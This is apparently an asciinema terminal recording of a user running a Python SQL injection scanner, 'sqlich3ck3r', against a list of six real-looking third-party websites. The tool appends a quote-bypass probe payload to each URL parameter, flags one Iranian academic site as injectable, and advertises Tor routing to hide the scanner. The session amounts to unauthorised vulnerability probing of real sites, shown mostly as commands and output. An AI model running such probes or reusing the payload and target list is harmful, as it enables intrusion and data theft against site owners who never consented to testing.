{"version": 2, "width": 98, "height": 21, "timestamp": 1590166043, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.024514, "o", "\u001b]0;oglinux@oglinux: /opt/sqlich3ck3r\u0007\u001b[01;32moglinux@oglinux\u001b[00m:\u001b[01;34m/opt/sqlich3ck3r\u001b[00m$ "]
[0.450525, "o", "c"]
[0.550334, "o", "a"]
[0.746434, "o", "t"]
[0.89048, "o", " "]
[1.022414, "o", "s"]
[1.114522, "o", "i"]
[1.206758, "o", "t"]
[1.294486, "o", "e"]
[1.540558, "o", ".txt "]
[1.77592, "o", "\r\n"]
[1.776532, "o", "https://www.ubuy.qa/en/search/?q=123\r\nhttps://diss.com.qa/?id=6\r\nhttp://www.ilslbd.com/content.php?Id=4\r\nhttps://www.sata.com/index.php?id=hvlppistolen&L=11\r\nhttp://ijt.arakmu.ac.ir/browse.php?a_code=A-10-2-56&slc_lang=en&sid=1&sw=Al\r\nhttps://jommid.pasteur.ac.ir/search.php?slc_lang=en&sid=1\r\n"]
[1.777468, "o", "\u001b]0;oglinux@oglinux: /opt/sqlich3ck3r\u0007\u001b[01;32moglinux@oglinux\u001b[00m:\u001b[01;34m/opt/sqlich3ck3r\u001b[00m$ "]
[3.182816, "o", "p"]
[3.314293, "o", "y"]
[3.410883, "o", "t"]
[3.534841, "o", "h"]
[3.671065, "o", "\u0007"]
[3.671436, "o", "on"]
[3.982677, "o", "4"]
[4.542552, "o", "\b\u001b[K"]
[4.586405, "o", "3"]
[4.758363, "o", "."]
[4.836402, "o", "\u0007"]
[4.836687, "o", "6"]
[5.557367, "o", " "]
[5.701137, "o", "s"]
[5.885528, "o", "q"]
[5.961651, "o", "l"]
[6.07165, "o", "ich3ck3r.py "]
[6.752056, "o", "\r\n"]
[6.865725, "o", "\u001b[3J\u001b[H\u001b[2J"]
[6.866055, "o", "\u001b[30;38;5;145m[\u001b[1;38;5;222m Title \u001b[0m\u001b[30;38;5;145m]\u001b[0m\u001b[1;38;5;111m Check if site has sql injection errors.. \u001b[0m\r\n                \u001b[0;33m\u001b[0m\u001b[1;32m\u001b[30;38;5;59mــــــ\u001b[1;37m❖\u001b[0mــــــ\u001b[0m\r\n\r\n         █  █       █           █\r\n ███     █      ███ █   ███     █   ███\r\n █   ███ █  █   █   ███   █ ███ █ █   █ ███\r\n  █  █ █ █  █   █   █ █ ███ █   ██  ███ █\r\n   █ █ █ █  █   █   █ █   █ █   ██    █ █\r\n ███ ███ ██ █   ███ █ █ ███ ███ █ █ ███ █\r\n       █\r\n       █\r\n\r\n[!] \u001b[1;38;5;189mfor example urls in site.txt :\u001b[0m\r\n\u001b[1;38;5;250m    http://site.com/in/file.php?id=123\r\n    https://site.com/in/file.aspx?uid=123\r\n    http://site.com/in/file/uid/123?=123\u001b[0m\r\n#use https://github.com/OGcyb3r/GetHref to get links from specific site.. Mind your business\r\n\r\n\u001b[1;38;5;155m-t\u001b[0m\u001b[1;38;5;255m scan with tor conn"]
[6.866434, "o", "ection\u001b[0m\u001b[1;38;5;255m\r\n\u001b[1;38;5;155m-x\u001b[0m\u001b[1;38;5;255m scan without tor connection\u001b[0m\r\n\r\n\u001b[30;38;5;189m python3 sqliCh3ck3r.py\u001b[1;38;5;117m site.txt \u001b[0m\u001b[1;38;5;155m-t\u001b[0m\r\n\u001b[30;38;5;189m python3 sqliCh3ck3r.py\u001b[1;38;5;117m site.txt \u001b[0m\u001b[1;38;5;152m-x\u001b[0m\r\n\r\n\r\n"]
[6.888107, "o", "\u001b]0;oglinux@oglinux: /opt/sqlich3ck3r\u0007\u001b[01;32moglinux@oglinux\u001b[00m:\u001b[01;34m/opt/sqlich3ck3r\u001b[00m$ "]
[7.690251, "o", "python3.6 sqlich3ck3r.py "]
[8.226661, "o", "s"]
[8.338899, "o", "i"]
[8.426491, "o", "t"]
[8.506302, "o", "e"]
[8.738577, "o", "."]
[8.887368, "o", "t"]
[9.069802, "o", "x"]
[9.25336, "o", "t"]
[9.397427, "o", " "]
[9.517811, "o", "-"]
[9.689741, "o", "x"]
[9.902005, "o", "\r\n"]
[10.012013, "o", "\u001b[3J\u001b[H\u001b[2J"]
[10.0124, "o", "\u001b[30;38;5;145m[\u001b[1;38;5;222m Title \u001b[0m\u001b[30;38;5;145m]\u001b[0m\u001b[1;38;5;111m Check if site has sql injection errors.. \u001b[0m\r\n                \u001b[0;33m\u001b[0m\u001b[1;32m\u001b[30;38;5;59mــــــ\u001b[1;37m❖\u001b[0mــــــ\u001b[0m\r\n\r\n         █  █       █           █\r\n ███     █      ███ █   ███     █   ███\r\n █   ███ █  █   █   ███   █ ███ █ █   █ ███\r\n  █  █ █ █  █   █   █ █ ███ █   ██  ███ █\r\n   █ █ █ █  █   █   █ █   █ █   ██    █ █\r\n ███ ███ ██ █   ███ █ █ ███ ███ █ █ ███ █\r\n       █\r\n       █\r\n       \r\n[\u001b[1;38;5;156m + \u001b[0m] Tor is Off\r\n\u001b[1;38;5;108mStarting...\u001b[0m\r\n\r\n\r\n"]
[10.6797, "o", "\u001b[1;38;5;189m[ \u001b[1;38;5;244m-\u001b[1;38;5;189m ]\u001b[0m ... \u001b[1;38;5;235mhttps://www.ubuy.qa/en/search/?q=1231%bf%5c%27\u001b[0m\r\n"]
[16.262425, "o", "\u001b[1;38;5;189m[ \u001b[1;38;5;244m-\u001b[1;38;5;189m ]\u001b[0m ... \u001b[1;38;5;235mhttps://diss.com.qa/?id=61%bf%5c%27\u001b[0m\r\n"]
[17.558824, "o", "\u001b[1;38;5;189m[ \u001b[1;38;5;244m-\u001b[1;38;5;189m ]\u001b[0m ... \u001b[1;38;5;235mhttp://www.ilslbd.com/content.php?Id=41%bf%5c%27\u001b[0m"]
[17.559394, "o", "\r\n"]
[17.985628, "o", "\u001b[1;38;5;189m[ \u001b[1;38;5;244m-\u001b[1;38;5;189m ]\u001b[0m ... \u001b[1;38;5;235mhttps://www.sata.com/index.php?id=hvlppistolen&L=111%bf%5c%27\u001b[0m\r\n"]
[18.344306, "o", "\u001b[1;38;5;189m[ \u001b[1;38;5;119m+\u001b[1;38;5;189m ]\u001b[0m SQL injection Detection => \u001b[1;38;5;118mhttp://ijt.arakmu.ac.ir/browse.php?a_code=A-10-2-56&slc_lang=en&sid=1&sw=Al1%bf%5c%27\u001b[0m\r\n"]
[18.724038, "o", "\u001b[1;38;5;189m[ \u001b[30;38;5;160m!\u001b[1;38;5;189m ]\u001b[0m Connection bloced your ip \u001b[1;38;5;235mhttps://jommid.pasteur.ac.ir/search.php?slc_lang=en&sid=11%bf%5c%27\u001b[0m\r\n"]
[18.725333, "o", "===========================================================================\r\n"]
[18.746555, "o", "\u001b]0;oglinux@oglinux: /opt/sqlich3ck3r\u0007\u001b[01;32moglinux@oglinux\u001b[00m:\u001b[01;34m/opt/sqlich3ck3r\u001b[00m$ "]
[20.122092, "o", "exit\r\n"]
